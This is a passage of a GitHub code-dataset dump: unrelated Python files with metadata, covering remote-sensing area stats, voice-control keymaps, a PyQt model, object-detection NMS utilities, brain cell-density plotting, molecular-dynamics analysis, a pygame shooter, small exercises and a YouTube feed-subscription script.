wdpa_binary.reproject(\n crs= crs_template,\n scale= area_stats.get_scale_from_image(template_image_1),\n).int8()\n\nprotected_areas_WDPA_area_hectares = area_stats.binary_to_area_hectares(wdpa_binary_reproj)\n\nprotected_areas_WDPA_area_hectares = area_stats.set_scale_property_from_image(protected_areas_WDPA_area_hectares,template_image_1,0,debug=True).set(\"dataset_id\",dataset_id)\n","repo_name":"lecrabe/fdap","sub_path":"datasets/wcmc_wdpa_protection.py","file_name":"wcmc_wdpa_protection.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"9484287062","text":"from talon.voice import Context, Key\nfrom ..misc.switcher import switch_app\n\nctx = Context(\"outlook\", bundle=\"com.microsoft.Outlook\")\n\nctx.keymap(\n {\n \"reply to e-mail\": Key(\"cmd-r\"),\n \"send e-mail\": Key(\"cmd-enter\"),\n \"clear flag\": None,\n \"next pain\": Key(\"shift-ctrl-[\"),\n \"preev pain\": Key(\"shift-ctrl-]\"),\n \"dismiss outlook\": [lambda m: switch_app(name=\"outlook\"), Key(\"cmd-w\")],\n }\n)\n\n\n\"\"\"\npack = Packages.register\n name: \"custom outlook\"\n applications: [\"com.microsoft.Outlook\"]\n description: \"custom commands for outlook\"\n\npack.commands\n \"reply-to-email\":\n spoken: \"reply to e-mail\"\n misspoken: 'reply email'\n description: \"reply to email\"\n enabled: true\n action: (input) ->\n @key 'r', 'command'\n \"send-email\":\n spoken: \"send e-mail\"\n description: \"send email\"\n enabled: true\n action: (input) ->\n @key 'enter', 'command'\n \"clear-flag\":\n spoken: \"clear flag\"\n description: \"clear flag\"\n enabled: true\n action: (input) ->\n @do 'os:openMenuBarPath', ['Message', 'Follow Up', 'Clear Flag']\n\npack.implement\n 'object:previous': -> @key '[', 'control'\n 'object:next': -> @key ']', 'control'\n 'object:backward': -> @key '[', 'shift control'\n 'object:forward': -> @key ']', 'shift control'\n\"\"\"\n","repo_name":"dwiel/talon_community","sub_path":"apps/outlook.py","file_name":"outlook.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"3"} +{"seq_id":"28069123150","text":"from __future__ import annotations\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtCore import pyqtSignal\nfrom typing import NamedTuple\n\nfrom services.setting import Setting\nfrom services.colour_setting import ColourSetting\nfrom services.sector_editor import SectorEditor\nfrom APImodels.sector import Sector\nfrom APImodels.problem import Problem\nfrom APImodels.colour import Colour\n\nclass SectorCellData(NamedTuple):\n # cell model containing data for sector cell\n\n col : int\n width : int\n bg_colour : Colour\n text_colour : Colour\n text : str\n problem_count : str\n\n\nclass SectorCellDataBuilder():\n # build sector cell data from either:\n # - sectors\n # - col - in case there isn't one\n\n def __init__(self, sector_editor:SectorEditor):\n self.sector_setting = sector_editor\n self.colour_setting = Setting.get(ColourSetting)\n\n def from_sector(self, sector:Sector):\n\n col = self.sector_setting.get_col(sector.name)\n width = 96 \n text = sector.name.upper()\n count = str(sector.count)\n bg_colour = self._background_colour(sector.setting)\n text_colour = self._text_colour(sector.setting)\n \n return SectorCellData(col, width, bg_colour, text_colour, text, count)\n\n def _background_colour(self, setting:bool):\n colour_str = 'setting' if setting else 'default'\n return self.colour_setting.get_bg_colour(colour_str) \n\n def _text_colour(self, setting:bool):\n colour_str = 'setting' if setting else 'default'\n return self.colour_setting.get_text_colour(colour_str)\n \n def from_col(self, col:int):\n width = 96 \n text = self.sector_setting.get_sector(col).upper()\n bg_colour = self._background_colour(False)\n text_colour = self._text_colour(False)\n\n return SectorCellData(col, width, bg_colour, text_colour, text, '0') \n\n\nclass SectorAreaData(NamedTuple):\n cells : tuple[SectorCellData,...]\n n_col : int\n height : int = 48\n \nclass SectorAreaDataBuilder():\n \n def __init__(self, sector_editor:SectorEditor):\n self._builder = SectorCellDataBuilder(sector_editor)\n self._sector_setting = sector_editor\n\n @property\n def n_col(self) -> int:\n return self._sector_setting.length()\n\n @property\n def sectors(self) -> tuple:\n return self._sector_setting.get_all_sectors()\n\n def default(self):\n cells = [self._builder.from_col(index) for index in range(self.n_col)]\n cells.sort(key= lambda x : x.col)\n return SectorAreaData(tuple(cells), self.n_col)\n\n def from_problems(self, problems:tuple[Problem,...]):\n prob = tuple(problems)\n if len(prob) == 0 :\n return self.default()\n set_date = self._last_setting_date(prob)\n sectors = [Sector.from_problems(s, prob, set_date) for s in self.sectors]\n cells = list([self._builder.from_sector(s) for s in sectors ])\n cells.sort(key= lambda x : x.col)\n return SectorAreaData(tuple(cells), self.n_col)\n\n def _last_setting_date(self, problems:tuple[Problem,...]):\n prob = tuple(problems)\n if len(prob) == 0: \n raise ValueError('_get_last_setting_date() don\\'t accept empty generator')\n return max([p.set_date for p in prob]) \n\n\nclass SectorAreaModel(QObject):\n \n cellsChanged = pyqtSignal(bool)\n _changes : SectorAreaData\n\n def __init__(self, sector_editor:SectorEditor):\n super().__init__()\n self._builder = SectorAreaDataBuilder(sector_editor)\n self._data = self._builder.default()\n self.changes = self._builder.default()\n\n @property\n def changes(self):\n return self._changes\n\n @changes.setter\n def changes(self, value: SectorAreaData):\n self._update_data(value)\n self._changes = value\n self.cellsChanged.emit(True)\n\n def _update_data(self, value: SectorAreaData):\n old_data = list(self._data.cells)\n new_data = list(value.cells)\n new_cells = [d.col for d in new_data]\n old_data_to_retain = [ d for d in old_data if not d.col in new_cells]\n new_data += old_data_to_retain\n self._data = SectorAreaData(tuple(new_data), value.n_col)\n\n def problems_changed(self, problems: tuple[Problem,...]) -> None:\n self.changes = self._builder.from_problems(problems)","repo_name":"Supasiti/problem_manager","sub_path":"models/sector_area_model.py","file_name":"sector_area_model.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8143246654","text":"import time\r\nimport numpy as np\r\nimport torch\r\nimport torchvision\r\n\r\n\r\ndef scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):\r\n # Rescale coords (xyxy) from img1_shape to img0_shape\r\n if ratio_pad is None: # calculate from img0_shape\r\n gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new\r\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\r\n else:\r\n gain = ratio_pad[0][0]\r\n pad = ratio_pad[1]\r\n coords[..., [0, 2]] -= pad[0] # x padding\r\n coords[..., [1, 3]] -= pad[1] # y padding\r\n coords[..., :4] /= gain\r\n clip_coords(coords, img0_shape)\r\n return coords\r\n\r\n\r\ndef clip_coords(boxes, img_shape):\r\n # Clip bounding xyxy bounding boxes to image shape (height, width)\r\n boxes[..., 0].clamp_(0, img_shape[1]) # x1\r\n boxes[..., 1].clamp_(0, img_shape[0]) # y1\r\n boxes[..., 2].clamp_(0, img_shape[1]) # x2\r\n boxes[..., 3].clamp_(0, img_shape[0]) # y2\r\n\r\n\r\ndef xyxy2xywh(x):\r\n # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right\r\n y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.copy(x)\r\n y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center\r\n y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center\r\n y[..., 2] = x[..., 2] - x[..., 0] # width\r\n y[..., 3] = x[..., 3] - x[..., 1] # height\r\n return y\r\n\r\n\r\ndef xywh2xyxy(x):\r\n # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right\r\n y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.copy(x)\r\n w_half = x[..., 2] / 2\r\n h_half = x[..., 3] / 2\r\n y[..., 0] = x[..., 0] - w_half # top left x\r\n y[..., 1] = x[..., 1] - h_half # top left y\r\n y[..., 2] = x[..., 0] + w_half # bottom right x\r\n y[..., 3] = x[..., 1] + h_half # bottom right y\r\n return y\r\n\r\n\r\ndef non_max_suppression(prediction,\r\n conf_thres=0.1, iou_thres=0.5,\r\n *, max_det=20, agnostic=False, return_per_image=True):\r\n \"\"\"Performs Non-Maximum Suppression (NMS) on inference results\r\n\r\n Params:\r\n prediction: (batch_size, locations, 4 + 1 + num_classes)\r\n\r\n Returns:\r\n detections with shape: nx6 (x1, y1, x2, y2, conf, cls)\r\n \"\"\"\r\n batch_size = prediction.shape[0]\r\n num_classes = prediction.shape[-1] - 5 # number of classes\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Settings\r\n min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height\r\n multi_label = (num_classes > 1) # multiple labels per box (adds 0.5ms/img)\r\n\r\n prediction = prediction.float() # crucial detail!\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Filter by object-ness\r\n object_candidate = (prediction[..., 4] > conf_thres).nonzero(as_tuple=False).T # candidates (2, nonzero_targets)\r\n # object_candidate[0]: batch_idx, object_candidate[1]: location_idx\r\n prediction = prediction[object_candidate[0], object_candidate[1], :].contiguous()\r\n # prediction: (num_targets, 4 + 1 + num_classes)\r\n if not prediction.shape[0]: # no targets\r\n return [torch.zeros(0, 6, dtype=prediction.dtype, device=prediction.device)] * batch_size\r\n\r\n # prediction = torch.cat((prediction, object_candidate[0][:, None]), dim=1)\r\n # prediction: (num_targets, 4 + 1 + num_classes + 1)\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Prepare NMS\r\n prediction[:, 5:] *= prediction[:, 4:5] # conf = obj_conf * cls_conf\r\n box = xywh2xyxy(prediction[..., :4]) # (center_x, center_y, width, height) -> (x1, y1, x2, y2)\r\n\r\n if multi_label:\r\n conf_candidate = (prediction[:, 5:] > conf_thres).nonzero(as_tuple=False).T # candidates (2, num_targets)\r\n # conf_candidate[0]: location_idx, conf_candidate[1]: class_idx - 5\r\n boxes = box[conf_candidate[0]] # (num_targets, 4)\r\n scores = prediction[conf_candidate[0], conf_candidate[1] + 5] # (num_targets,)\r\n classes = conf_candidate[1].float() # (num_targets,)\r\n indices = object_candidate[0][conf_candidate[0]] # (num_targets,)\r\n else: # always class 0\r\n conf_candidate = (prediction[:, 5] > conf_thres).nonzero(as_tuple=False).T # candidates (1, num_targets,)\r\n # conf_candidate[0]: location_idx\r\n boxes = box[conf_candidate[0]] # (num_targets, 4)\r\n scores = prediction[conf_candidate[0], 5] # (num_targets,)\r\n classes = torch.zeros(boxes.shape[0], dtype=boxes.dtype, device=boxes.device) # (num_targets,)\r\n indices = object_candidate[0][conf_candidate[0]] # (num_targets,)\r\n\r\n if not boxes.shape[0]: # no targets\r\n return [torch.zeros(0, 6, dtype=prediction.dtype, device=prediction.device)] * batch_size\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Run batched NMS\r\n offset = classes * (0 if agnostic else max_wh)\r\n boxes_with_offset = boxes + offset[:, None] # boxes (offset by class)\r\n\r\n nms_indices = torchvision.ops.boxes.batched_nms(boxes_with_offset, scores, indices, iou_threshold=iou_thres)\r\n nms_result_indices = indices[nms_indices] # (num_boxes,)\r\n\r\n nms_result = torch.cat([boxes[nms_indices, :],\r\n scores[nms_indices, None],\r\n classes[nms_indices, None]], dim=1) # (num_boxes, 6)\r\n\r\n # -------------------------------------------------------------------------------- #\r\n # Split to per-batch (most slowest part)\r\n\r\n if return_per_image:\r\n output = []\r\n for image_idx in range(batch_size):\r\n image_result = nms_result[nms_result_indices == image_idx].clone()\r\n if image_result.shape[0] > max_det:\r\n image_result = image_result[:max_det]\r\n output.append(image_result)\r\n else:\r\n output = (nms_result, nms_result_indices)\r\n\r\n return output\r\n","repo_name":"aiha-lab/Optimization-method-for-human-detection-on-street-view-CCTV-images","sub_path":"kh_utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"25156237737","text":"import sys\nsys.path.append('/scratch/programming/pipeline/pipeline')\nfrom pipeline.Controllers.SqlController import SqlController\nfrom atlas.Assembler import get_assembled_atlas_v7\nimport plotly.graph_objects as go\nimport numpy as np\nfrom Plotter.Plotter import Plotter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom atlas.atlas_manager import Atlas\nfrom pipeline.Controllers.SqlController import SqlController\nfrom atlas.NgSegmentMaker import NgConverter\nfrom atlas.Assembler import Assembler,get_v7_volume_and_origin,get_assembled_atlas_v7\nfrom pipeline.Controllers.SqlController import SqlController\nimport pickle\nfrom Plotter.Plotter import Plotter\nimport numpy as np\n\nanimal = 'DK41'\ncontroller = SqlController(animal)\n# cell_controller = MarkedCellController()\nresolution = controller.get_resolution(animal)\n# cells = cell_controller.get_marked_cells(search_dictionary = dict(id = 3586))\n# # cells = cells*resolution\n# bin_voxel = [500,500,500]\n# bins = []\n# for i,stepi in enumerate(bin_voxel):\n# axis_max = cells.max(axis=0)[i]\n# axis_bins = list(range(0,int(axis_max)+1,stepi))\n# bins.append(axis_bins)\n# count,bins =np.histogramdd(cells,bins = bins)\n\nassenbler = get_assembled_atlas_v7()\n\ndef hist3d(data):\n origin = np.min(data,axis = 1).astype(int)\n end = np.max(data,axis = 1).astype(int)+1\n data = data - np.min(data,axis = 1).reshape(-1,1)\n shape = np.max(data,axis = 1).astype(int)\n density = np.zeros(shape)\n npoints = data.shape[1]\n for i in range(npoints):\n point = data[:,i].astype(int)-1\n density[point[0],point[1],point[2]] += 1\n return density,origin,end \n\ncontroller = SqlController('DK39')\natlas = Atlas(atlas = 'atlasV7')\natlas.get_com_array()\nassembler = Assembler(check=False,side = '_R')\nassembler.volumes,assembler.origins = get_v7_volume_and_origin()\nassembler.sqlController = atlas.sqlController\nassembler.structures = list(assembler.volumes.keys())\nsegment_to_id = controller.get_segment_to_id_where_segment_are_brain_regions()\nfor i in segment_to_id:\n segment_to_id[i]=1\nassembler.assemble_all_structure_volume(segment_to_id)\n\nfrom cell_extractor.CellDetectorBase import CellDetectorBase\nanimal = 'DK41'\nbase = CellDetectorBase(animal,round = 2)\ndetections = base.load_detections()\nsure = detections[detections.predictions==2]\nsure = np.array([sure.col,sure.row,sure.section])\nsure.shape\nsure = detections[detections.predictions==2]\nunsure = detections[detections.predictions==0]\ndownsample_factor = 32\n# bin_voxel = [500,500,500]\n# bins = []\n# for i,stepi in enumerate(bin_voxel):\n# axis_max = sure.max(axis=0)[i]\n# axis_bins = list(range(0,int(axis_max)+1,stepi))\n# bins.append(axis_bins)\n# count,bins =np.histogramdd(sure,bins = bins)\n\ndata = sure[sure.section==180]\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1) #.astype(int)\n\nsection = 200\ndata = sure[sure.section==section]\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1) #.astype(int)\nsource = 'DK41'\ndestination = 'Atlas'\nplotter = Plotter()\ncontroller = SqlController('Atlas')\ntransformation = controller.get_transformation_row(source = source,destination = destination, transformation_type = 'Similarity')\nrigid_transform = pickle.loads(transformation.transformation)\ntfdata = rigid_transform.forward_transform_points(data.T).T/np.array([10,10,20]).reshape(-1,1)\nplt.figure(figsize=(np.array(assenbler.combined_volume.shape[:2])/50).astype(int))\nplt.imshow(assenbler.combined_volume[:,:,section])\nplt.scatter(tfdata[0],tfdata[1])\n\nfrom scipy.ndimage import zoom\ntest = zoom(assenbler.combined_volume, (0.1, 0.1, 0.1))\ntest.shape\n\nshape = test.shape\nvolume = test\nX, Y, Z = eval(f'np.mgrid[ 0:{shape[0]/2}:{shape[0]}j, \\\n 0:{shape[1]/2}:{shape[1]}j, \\\n 0:{shape[2]}:{shape[2]}j]')\ndata = sure\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1) #.astype(int)\nsource = 'DK41'\ndestination = 'Atlas'\nplotter = Plotter()\ncontroller = SqlController('Atlas')\ntransformation = controller.get_transformation_row(source = source,destination = destination, transformation_type = 'Similarity')\nrigid_transform = pickle.loads(transformation.transformation)\ntfdata = rigid_transform.forward_transform_points(data.T).T/np.array([10,10,20]).reshape(-1,1)\ndata = []\ndsfdata = tfdata*0.1*np.array([0.5,0.5,1]).reshape(-1,1)\ndata.append(go.Scatter3d(x=dsfdata[0], y=dsfdata[1], z=dsfdata[2],marker=dict(size=5,opacity=0.8),\n mode='markers'))\ndata.append(go.Volume(\n x=X.flatten(),\n y=Y.flatten(),\n z=Z.flatten(),\n value=volume.flatten(),\n isomin=1,\n isomax=40,\n opacity=0.5, # needs to be small to see through all surfaces\n surface_count=2, # needs to be a large number for good volume rendering\n ))\nfig = go.Figure(data=data)\nfig['layout']['scene']['aspectmode'] = \"data\"\n# fig.show()\nfig.write_html(\"/net/birdstore/Active_Atlas_Data/atlas.html\")\n\ndef plot_3d_volume(volume,X,Y,Z,*args,**kwargs):\n shape = volume.shape\n source = 'DK41'\n destination = 'Atlas'\n plotter = Plotter()\n controller = SqlController('Atlas')\n transformation = controller.get_transformation_row(source = source,destination = destination, transformation_type = 'Similarity')\n rigid_transform = pickle.loads(transformation.transformation)\n return go.Volume(\n x=X.flatten(),\n y=Y.flatten(),\n z=Z.flatten(),\n value=volume.flatten(),\n *args,**kwargs,\n )\n\ndata = sure\ndata = (np.array([data.col,data.row,data.section]))*np.array([0.325,0.325,20]).reshape(-1,1)\ntfdata = rigid_transform.forward_transform_points(data.T).T/np.array([10,10,20]).reshape(-1,1)\ntfdata = tfdata*0.1*np.array([1,1,2]).reshape(-1,1)\ndensity,origin,end = hist3d(tfdata)\nshape = test.shape\nX, Y, Z = eval(f'np.mgrid[ 0:{shape[0]}:{shape[0]}j, \\\n 0:{shape[1]}:{shape[1]}j, \\\n 0:{shape[2]*2}:{shape[2]}j]')\np1 = plot_3d_volume(test,X, Y, Z,isomin=1,\n isomax=40,\n opacity=0.5, \n surface_count=2, opacityscale=\"max\",)\nshape = density.shape\nX, Y, Z = eval(f'np.mgrid[ {origin[0]}:{end[0]}:{shape[0]}j, \\\n {origin[1]}:{end[1]}:{shape[1]}j, \\\n {origin[2]}:{end[2]}:{shape[2]}j]')\np2 = plot_3d_volume(density,X, Y, Z,isomin=1,\n isomax=20,\n opacity=0.5, \n surface_count=20, )\ndata = []\n# data.append(p1)\ndata.append(p2)\n# data.append(go.Scatter3d(x=tfdata[0], y=tfdata[1], z=tfdata[2],marker=dict(size=5,opacity=0.8),\n# mode='markers'))\nfig = go.Figure(data=data)\nfig['layout']['scene']['aspectmode'] = \"data\"\nfig.update_layout(scene_aspectmode=\"data\", \n scene_camera_eye=dict (x=1, y=1, z=1))\nfig.write_html(\"/net/birdstore/Active_Atlas_Data/atlas.html\")\n\n\norigin,end,end - origin,density.shape,tfdata.max(axis=1)\n\n\ndensity,origin,end = hist3d(tfdata)\n\n\ndensity.shape\n\n\nplt.imshow(density[:,:,15].T)\nplt.scatter(idata[0]-origin[0],idata[1]-origin[1])\n\n\n(density[density>0]).min(),density.max()\n\n\npt = density[density>1]\nplt.hist(pt.flatten())\n\n\ndef hist3d(data):\n bin_voxel = [1,1,1]\n bins = []\n for i,stepi in enumerate(bin_voxel):\n axis_max = data.max(axis=0)[i]\n axis_bins = list(range(0,int(axis_max)+1,stepi))\n bins.append(axis_bins)\n count,bins =np.histogramdd(data,bins = bins)\n return count,bins\n\n\ncount,bins = hist3d(data)\n\n\ndata = data.T\nbin_voxel = [1,1,1]\nbins = []\nfor i,stepi in enumerate(bin_voxel):\n axis_max = data.max(axis=0)[i]\n axis_bins = list(range(0,int(axis_max)+1,stepi))\n bins.append(axis_bins)\ncount,bins =np.histogramdd(data,bins = bins)\n\n\ncount,bins = np.histogramdd(data.T)\n\n\ncount.shape\n\n\nbins = []\nfor i in test.shape:\n bins.append(list(range(i+1)))\ncount,bins = np.histogramdd(data.T,bins)\n\n\ncount.shape,test.shape\n\n\n\n\n\n","repo_name":"ActiveBrainAtlas2/preprocessing-pipeline","sub_path":"in_development/Will/old/cell_density/CellDensityManager.py.py.py","file_name":"CellDensityManager.py.py.py","file_ext":"py","file_size_in_byte":8040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"26229090523","text":"from tqdm import tqdm\nimport subprocess\nimport numpy as np\nimport os\n\nimport folder_processer as folder\nimport file_processer as file\nimport Path_pull as PP\n\ngver1 = \"GHz\"\nGHz = 10**9\n\ngvar2 = \"ps\"\nps = 10 ** -12\n\n#==========モデル関数生成==========\ndef model():\n print(\"保存先のフォルダを選択してください\")\n main_path = folder.finder()\n\n print(\"モデル関数を格納するフォルダ名を入力してください\")\n fname = input(\"フォルダ名: \")\n save_path = folder.maker(main_path, fname)\n\n end_time = float(input(\"計算時間[ps]: \"))\n tau = float(input(\"緩和時間[ps]: \"))\n dc = float(input(\"DC成分: \"))\n dt = float(input(\"時間刻み[ps]: \"))\n\n data = []\n i = 0\n time = float(0)\n while time < end_time:\n time = i * dt\n fu = np.exp(- time / tau) + dc\n data.append([time * ps, fu])\n i += 1\n\n fname = os.path.join(save_path, f\"{fname}.csv\")\n np.savetxt(f\"{fname}\",\n data,\n delimiter=\",\")\n\n print(\"\")\n print(\"モデル関数が生成されました\")\n#==========ラプラス・フーリエ変換単独実行==========\n\ndef single_LFT():\n file_path = PP.csv()\n folder_path = os.path.dirname(file_path)\n save_name = input(\"保存名: \")\n relax_path = folder.maker(folder_path, save_name)\n\n\n\n s_fre = float(input(\"開始周波数[GHz]: \"))\n e_fre = float(input(\"終端周波数[GHz]: \"))\n df = float(input(\"周波数刻み[GHz]: \"))\n\n print(\"=====Start LFT=====\")\n\n i = 0\n relax_data = []\n fre = s_fre\n csv = file.csv_reader(file_path)\n print(f\"目標周波数{e_fre}\")\n #名前 計算実行周波数\n with tqdm() as pber:\n while fre <= e_fre:\n fre = s_fre + i * df\n w = 2 * np.pi * fre * GHz\n\n re = np.sum(csv[:, 1] * np.cos(w * csv[:, 0]) * csv[1][0])\n im = np.sum(csv[:, 1] * np.sin(w * csv[:, 0]) * csv[1][0])\n\n relax_data.append([np.log10(fre * GHz), re, im])\n pber.update(df)\n i += 1\n relax = os.path.join(relax_path, f\"{save_name}.txt\")\n np.savetxt(relax, relax_data, delimiter=\"\\t\")\n\n\n# メイン部分\nwhile True:\n print(\"= \" * 40)\n print(\"モデル関数作成: 1\")\n print(\"auto-and cross-correlation function 生成: 2\")\n print(\"ラプラス・フーリエ変換: 3\")\n print(\"精度分析: 4\")\n print(\"終了コマンド: Push Enter_key\")\n ope_1 = input(\"操作番号を入力してください。(半角英数): \")\n print(\"\")\n\n if (ope_1 == \"1\"):\n model()\n elif(ope_1 == \"2\"):\n print(\"=====溶液系を選んでください=====\")\n print(\"Pure: 0\")\n print(\"Mixture: 1\")\n ope_2 = input(\"system: \")\n if(ope_2 == \"0\"):\n subprocess.run([\"Python\", \"Pure_dipole.py\"], check=True)\n elif(ope_2 == \"1\"):\n subprocess.run([\"Python\", \"Mix_dipole.py\"], check=True)\n elif(ope_1 == \"3\"):\n single_LFT()\n elif(ope_1 == \"4\"):\n subprocess.run([\"Python\", \"Result_Analyzer.py\"], check=True)\n elif ope_1 == \"\": # エンターキーを押した場合、MD_relaxation_maker.pyを終了する.\n print(\"<<<操作を終了します>>>\")\n break\n else: # その他の入力は再入力をようきゅされるようにwhileループさせている.\n print(\"コマンドが間違っています。最初からやり直してください\\n\")","repo_name":"nameneko0023/Molecular-Dynamics_Cal","sub_path":"MDAnalyzer/MD_analyzer/MD_relaxation_ver2.0.0.py","file_name":"MD_relaxation_ver2.0.0.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31762025092","text":"import pygame\n\nwhite = (255, 255, 255)\ngreen = (0, 255, 0)\nblack = (0, 0, 0)\nred = (255, 0, 0)\n\nclass Player(pygame.sprite.Sprite):\n\n def __init__(self, x, y):\n super().__init__() #calling inheritance of the sprite function\n self.image = pygame.image.load('player.png')\n self.image = pygame.transform.scale(self.image, (70, 100))\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\nclass Bullet(pygame.sprite.Sprite):\n\n def __init__(self, playerlocation, mouselocation):\n super().__init__()\n self.image = pygame.Surface([5, 5])\n self.image.fill(red)\n self.rect = self.image.get_rect()\n self.rect.x = playerlocation[0]\n self.rect.y = playerlocation[1]\n self.direction = (playerlocation[1]-mouselocation[1])/(abs(playerlocation[0]-mouselocation[0]))*-1\n\n def update(self):\n self.rect.x += 1\n self.rect.y += self.direction\n print(\"fjfgju\")\n\n\npygame.init()\nscreenx = 600\nscreeny = 800\ndisplay_surface = pygame.display.set_mode([screenx, screeny]) # setting the screen size for the game\npygame.display.set_caption(\"SUPER STICKMAN SHOOTER\")\nfont = pygame.font.Font('AldotheApache2.ttf', 70)\nfont1 = pygame.font.Font('AldotheApache2.ttf', 90)\nfont2 = pygame.font.Font('AldotheApache2.ttf', 50)\ntext = font.render('SUPER STICKAN', True, green)\ntext1 = font1.render('SHOOTER', True, green)\ntext2 = font2.render('PRESS SPACE TO START', True, green)\ntextbound = text.get_rect()\ntextbound1 = text1.get_rect()\ntextbound2 = text2.get_rect()\ntextbound.x = ((screenx/2)-190)\ntextbound.y = 200\ntextbound1.x = ((screenx/2)- 150)\ntextbound1.y = 255\ntextbound2.x = 90\ntextbound2.y = 400\nbg1 = pygame.image.load('background1.jpeg')\nbg2 = pygame.image.load('background.jpeg')\n\nall_sprites_list = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\nstickman = Player(250, 690)\n\nall_sprites_list.add(stickman)\n\nruntime = True\ndisplay_surface.blit(bg1, [0,0])\ndisplay_surface.blit(text, textbound)\ndisplay_surface.blit(text1, textbound1)\ndisplay_surface.blit(text2, textbound2)\nstart = False\n\nwhile runtime == True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE]:\n start = True\n\n\n if keys[pygame.K_a] and stickman.rect.x > 0:\n stickman.rect.x -= 10\n if keys[pygame.K_d] and stickman.rect.x < (600 - 75):\n stickman.rect.x += 10\n if keys[pygame.K_w]:\n Mouse_x, Mouse_y = pygame.mouse.get_pos()\n bullet = Bullet((stickman.rect.x, stickman.rect.y), (Mouse_x, Mouse_y))\n bullets.add(bullet)\n\n #WHILE SPACE KEY IS PRESSED STUFF HAPPEN HERE\n if start:\n display_surface.blit(bg2, [0, 0])\n all_sprites_list.draw(display_surface)\n bullets.update()\n bullets.draw(display_surface)\n\n pygame.display.flip()\n\npygame.quit()\n","repo_name":"notandrewsimpson/unit3game","sub_path":"pygame prokect.py","file_name":"pygame prokect.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36729631790","text":"a=int(input(\"enter number\"))\ncount=0\ni=1\nwhile(i<=a):\n if(a%i==0):\n count=count+1\n i=i+1\nif(count==2):\n print(\"prime number\")\nelse:\n print(\"composite number\") \n\n\n\n","repo_name":"MadhavMadan336/personal-program","sub_path":"Python/to_check_whether_a_number_is_prime_or_not.py","file_name":"to_check_whether_a_number_is_prime_or_not.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33697211003","text":"def find_it(seq):\n list = []\n seq.sort()\n count = 0 \n for x in seq:\n x = str(x)\n print(seq)\n index = 0\n for num in seq:\n index += 1\n print(num)\n if num in list:\n count += 1\n print(f\"count of {num}:{count}\")\n else:\n if count != 0 and count % 2 != 0:\n print(f'count of {num}:{count} and is odd')\n print(f'returning {seq[index-2]}')\n return seq[index-2]\n else:\n count = 1\n list.append(num)\n print(f'appended {num}')\n return seq[-1]\n","repo_name":"magnustymoteus/problem-solving","sub_path":"katas/python/find-odd-int.py","file_name":"find-odd-int.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"93827846","text":"import requests\nimport json\n\n# Get secret keys from JSON file\nwith open('keys.json') as json_file:\n key = json.load(json_file)\n\ndef save():\n with open('keys.json',\"w\") as json_file:\n json_file.write(json.dumps(key, indent=4))\n\nsubscribe_url = 'https://pubsubhubbub.appspot.com/subscribe'\ndata = {\n 'hub.callback':key.get(\"callback_url\"),\n 'hub.verify': 'sync',#'async',\n 'hub.mode': 'subscribe',\n 'hub.lease_seconds': '828000'\n}\n\nwhile key.get(\"channels_todo\").get(\"channel_id\"):\n CHANNEL_ID=key.get(\"channels_todo\").get(\"channel_id\").pop(0)\n if CHANNEL_ID in key.get(\"channels_done\").get(\"channel_id\"):\n continue\n topic_url = 'https://www.youtube.com/feeds/videos.xml?channel_id=%s'%CHANNEL_ID\n data['hub.topic']=topic_url\n print(topic_url,data.get('hub.callback'))\n response = requests.post(subscribe_url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data=data)\n print(CHANNEL_ID,response.status_code,response.text)\n if response.status_code==204:\n key.get(\"channels_done\").get(\"channel_id\").append(CHANNEL_ID)\n save()\n\n\nwhile key.get(\"channels_todo\").get(\"username\"):\n USERNAME=key.get(\"channels_todo\").get(\"username\").pop(0)\n if USERNAME in key.get(\"channels_done\").get(\"username\"):\n continue\n topic_url = 'https://www.youtube.com/feeds/videos.xml?user=%s'%USERNAME\n data['hub.topic']=topic_url\n response = requests.post(subscribe_url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data=data)\n 